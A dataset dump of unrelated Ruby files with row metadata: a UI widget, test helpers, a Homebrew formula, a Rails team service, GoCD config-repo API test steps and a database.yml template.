attr_accessor_with_redraw :text, :fg, :bg
def initialize(rect, text, fill_options={})
super rect
@text = text
@fg = fill_options[:fg]
@bg = fill_options[:bg]
request_redraw_internal
end
def pointer_inside?(loc) false; end
def draw_background
buffer.contents = text
buffer.fill :fg => fg, :bg => bg
end
end
end
end
| 18 | 45 | 0.689815 |
216119758f6b42710404ebfdc36a02eafe2c189e | 336 | unless ENV['CI']
require 'simplecov'
SimpleCov.start do
add_filter 'spec'
end
end
require 'livelyfeed'
require 'rspec'
require 'stringio'
require 'tempfile'
require 'timecop'
require 'webmock/rspec'
def fixture_path
File.expand_path("../fixtures", __FILE__)
end
def fixture(file)
File.new(fixture_path + '/' + file)
end | 16 | 43 | 0.72619 |
b9f79c753bc089c8ff3d17c9bec339dbb56f68d3 | 1,355 | class AbiComplianceChecker < Formula
desc "Check binary and source compatibility for C/C++"
homepage "http://ispras.linuxbase.org/index.php/ABI_compliance_checker"
url "https://github.com/lvc/abi-compliance-checker/archive/1.99.21.tar.gz"
sha256 "c9ca13a9a7a0285214f9a18195efae57a99465392fbf05fdc4a15fceada4dedf"
bottle do
cellar :any_skip_relocation
sha256 "1b6be53767663eaf2ee6b938e485ff6fcbd03069abf4a64a7fe2e67076faa479" => :el_capitan
sha256 "74d3ef1fff52a93936a8ae81d3dc9a6a2497cbcd5babf735d803b734d1d749fc" => :yosemite
sha256 "418e0920e1e2e90efe573a3e617a4a6b4aa90c27e7e6843ae178a262b9f858de" => :mavericks
end
depends_on "ctags"
depends_on "gcc" => :run
def install
system "perl", "Makefile.pl", "-install", "--prefix=#{prefix}"
rm bin/"abi-compliance-checker.cmd"
end
test do
(testpath/"test.xml").write <<-EOS.undent
<version>1.0</version>
<headers>#{Formula["ctags"].include}</headers>
<libs>#{Formula["ctags"].lib}</libs>
EOS
gcc_suffix = Formula["gcc"].version.to_s.slice(/\d/)
system bin/"abi-compliance-checker", "-cross-gcc", "gcc-" + gcc_suffix,
"-lib", "ctags",
"-old", testpath/"test.xml",
"-new", testpath/"test.xml"
end
end
| 38.714286 | 92 | 0.658303 |
e29046165e7bf7fd17e4f8c32f2c9b21867e0459 | 1,119 | module ClientApi
class TeamsService
def initialize(arg)
@params = arg.fetch(:params) { false }
@user = arg.fetch(:current_user) { raise ClientApi::CustomTeamError }
team_id = arg.fetch(:team_id) { raise ClientApi::CustomTeamError }
@team = Team.find_by_id(team_id)
raise ClientApi::CustomTeamError unless @user.teams.include? @team
end
def change_current_team!
@user.update_attribute(:current_team_id, @team.id)
end
def team_page_details_data
team_users = UserTeam.includes(:user)
.references(:user)
.where(team: @team)
.distinct
{ team: @team, team_users: team_users }
end
def single_team_details_data
{ team: @team }
end
def update_team!
raise ClientApi::CustomTeamError unless @params
return if @team.update_attributes(@params)
raise ClientApi::CustomTeamError, @team.errors.full_messages
end
def teams_data
{ teams: @user.datatables_teams }
end
end
CustomTeamError = Class.new(StandardError)
end
| 27.975 | 75 | 0.637176 |
5da8edc2c6d6e2eb9a011b757d2eab7c5bda9902 | 378 | # frozen_string_literal: true
module ValidatorHelper
class Validatable
include ActiveModel::Model
def self.model_name
ActiveModel::Name.new self, nil, 'temp'
end
# we need to set explicitly i18n_scope to :activerecord
# this way we can test i18n of error messages without ActiveRecord
def self.i18n_scope
:activerecord
end
end
end
| 21 | 70 | 0.716931 |
d58c2bee38f065f1e859a8179e42abba47d89880 | 4,771 | #
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##########################################################################
require_relative '../../lib/helpers/go_url_helper.rb'
CONFIG_REPO_API_VERSION = 'application/vnd.go.cd+json'.freeze
CONFIG_REPO_BASE_URL = '/api/admin/config_repos'.freeze
step 'Create config repo <id>' do |id|
assert_true create_config_repo(id).code == 200
end
step 'Create config repo <id> should return forbidden' do |id|
begin
create_config_repo(id)
raise 'Expected create config_repo to fail'
rescue RestClient::ExceptionWithResponse => e
raise 'Response Code is not 403' unless e.response.code == 403
end
end
step 'Get config repo <id> should return success' do |id|
assert_true get_config_repo(id).code == 200
end
step 'Get config repo <id> should return forbidden' do |id|
begin
get_config_repo(id)
raise 'Expected get config_repo to fail'
rescue RestClient::ExceptionWithResponse => e
raise 'Response Code is not 403' unless e.response.code == 403
end
end
step 'Get all config repos should have <repos>' do |repos|
actual = JSON.parse(get_all_config_repos.body)['_embedded']['config_repos'].map {|cr| cr['id']}.sort
expected = repos.split(/[\s,]+/).map {|exp| scenario_state.get(exp).nil? ? exp : scenario_state.get(exp)}.sort
assert_true (expected - actual).empty?, "Assertion failed. Expected: #{expected}, Actual: #{actual}"
end
step 'Get all config repos should not have <repos>' do |repos|
actual = JSON.parse(get_all_config_repos.body)['_embedded']['config_repos'].map {|cr| cr['id']}.sort
expected = repos.split(/[\s,]+/).map {|exp| scenario_state.get(exp).nil? ? exp : scenario_state.get(exp)}.sort
assert_true actual.none? {|n| expected.include?(n)}, "Assertion failed. Expected: #{expected} not to be in: #{actual}"
end
step 'Update config repo <id> should return success' do |id|
assert_true update_config_repo(id).code == 200
end
step 'Update config repo <id> should return forbidden' do |id|
begin
update_config_repo(id)
raise 'Expected update config repo to fail'
rescue RestClient::ExceptionWithResponse => e
raise 'Response Code is not 403' unless e.response.code == 403
end
end
step 'Delete config repo <id> should return success' do |id|
assert_true delete_config_repo(id).code == 200
end
step 'Delete config repo <id> should return forbidden' do |id|
begin
delete_config_repo(id)
raise 'Expected delete config repo to fail'
rescue RestClient::ExceptionWithResponse => e
raise 'Response Code is not 403' unless e.response.code == 403
end
end
private
def get_all_config_repos
RestClient.get http_url(CONFIG_REPO_BASE_URL),
{accept: CONFIG_REPO_API_VERSION}
.merge(basic_configuration.header)
end
def get_config_repo(id)
RestClient.get http_url("#{CONFIG_REPO_BASE_URL}/#{id}"),
{accept: CONFIG_REPO_API_VERSION}
.merge(basic_configuration.header)
end
def create_config_repo(id)
RestClient.post http_url(CONFIG_REPO_BASE_URL),
request_body_for_repo(id),
{content_type: :json, accept: CONFIG_REPO_API_VERSION}
.merge(basic_configuration.header)
end
def delete_config_repo(id)
RestClient.delete http_url("#{CONFIG_REPO_BASE_URL}/#{id}"),
{accept: CONFIG_REPO_API_VERSION}
.merge(basic_configuration.header)
end
def update_config_repo(id)
etag = get_config_repo(id).headers[:etag]
RestClient.put http_url("#{CONFIG_REPO_BASE_URL}/#{id}"),
request_body_for_repo(id),
{content_type: :json, accept: CONFIG_REPO_API_VERSION, if_match: etag}
.merge(basic_configuration.header)
end
def request_body_for_repo(id, plugin_id = 'json.config.plugin', material = Context::GitMaterials.new, configuration = [])
tmp = {
:id => id,
:plugin_id => plugin_id,
:material => {
:type => "git",
:attributes => {
:url => material.path,
:branch => "master",
:auto_update => true
}
},
:configuration => configuration
}
JSON.generate(tmp)
end
| 35.080882 | 121 | 0.671138 |
33ca67e033e8b04dd6f4b0bdd72eab433bd79f8b | 621 | # TODO think about a better way
db_name = app_path.split('/').last
remove_file 'config/database.yml'
create_file 'config/database.yml' do
<<-YAML
defaults: &defaults
adapter: sqlite3
development:
database: dm_rails3_app_development.db
<<: *defaults
# Add more repositories
# repositories:
# repo1:
# adapter: postgresql
# database: sample_development
# username: the_user
# password: secrets
# host: localhost
# repo2:
# ...
test:
database: dm_rails3_app_test.db
<<: *defaults
production:
database: dm_rails3_app_production.db
<<: *defaults
YAML
end
| 18.818182 | 40 | 0.677939 |
6a1e390a89391cb8ee322b4af58e8f3a9e831985 | 142 | json.extract! protocol, :id, :Name, :Version, :Type, :DefinitionData, :created_at, :updated_at
json.url protocol_url(protocol, format: :json)
| 47.333333 | 94 | 0.753521 |
ed40657bc07b7ff50610e9e67f9829baad3efcd0 | 638 | # frozen_string_literal: true
require "simplecov"
SimpleCov.start
require "bundler/setup"
require "rails"
require "superconfig"
require "minitest/autorun"
require "minitest/utils"
ENV["RAILS_MASTER_KEY"] = "ruby-on-rails-sample-credentials"
class TestApp < Rails::Application
def credentials
@credentials ||= encrypted("#{__dir__}/test.yml.enc")
end
end
ActiveSupport::EncryptedFile.new(
content_path: Pathname.new("#{__dir__}/test.yml.enc"),
key_path: Pathname.new("#{__dir__}/test.key"),
env_key: "RAILS_MASTER_KEY",
raise_if_missing_key: true
).write(YAML.dump(secret: "secret", another_secret: "another_secret"))
| 24.538462 | 70 | 0.752351 |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.